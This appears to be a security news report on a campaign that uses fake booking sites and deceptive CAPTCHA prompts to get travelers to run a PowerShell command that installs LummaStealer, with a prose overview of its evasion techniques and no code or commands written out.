Sophisticated Attack Via Booking Websites Installs LummaStealer Malware

Cybercriminals have launched a new sophisticated attack campaign targeting travelers through fake booking websites.

The campaign, discovered in early 2025, tricks users into installing LummaStealer malware through deceptive CAPTCHA verification processes, putting personal and financial information at risk.

The attack begins when unsuspecting victims visit what appears to be a legitimate booking confirmation page.

Before viewing their booking details, users encounter a CAPTCHA verification that requires them to click an “I’m not a robot” checkbox.

Unlike legitimate CAPTCHA systems, this fraudulent verification instructs users to open their Windows Run command and paste a pre-copied command.

G Data analysts identified that this attack initially targeted travelers booking trips to Palawan, Philippines, but later shifted to targeting hotel bookings in Munich, Germany, indicating a global campaign.

The researchers noted this represents a significant change in LummaStealer’s distribution strategy, which previously relied primarily on GitHub or Telegram channels.

When users follow the deceptive instructions, they unknowingly execute a PowerShell command that initiates the infection chain.

The command runs a Base64-encoded script that downloads the LummaStealer payload from the attacker’s server and executes it on the victim’s system, all while bypassing traditional security measures since the user initiated the execution.

The entire infection chain consists of four distinct stages that ultimately lead to the installation of LummaStealer, an information-stealing malware operating under a Malware-as-a-Service model.

Technical Infection Process

The malware samples collected during the investigation are notably larger than previous versions, increasing by up to 350% (from 2MB to 9MB).

This increase in size serves as an evasion technique known as Binary Padding, where malware authors add junk data to extend file size and potentially avoid detection by security tools.

The malware also employs an obfuscation technique called Indirect Control Flow, which uses Dispatcher Blocks to dynamically calculate target addresses at runtime rather than using direct jumps or calls, making analysis significantly more difficult.

The implementation involves obfuscated PHP scripts encrypted with ROT13 that, when decrypted, reveal JavaScript that copies Base64-encoded commands to the victim’s clipboard.

When executed, these commands download and run the LummaStealer payload, which then harvests sensitive information from the compromised system.

Security researchers expect LummaStealer attacks to continue increasing in the coming months as attackers refine their social engineering techniques to exploit travelers seeking online booking services.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free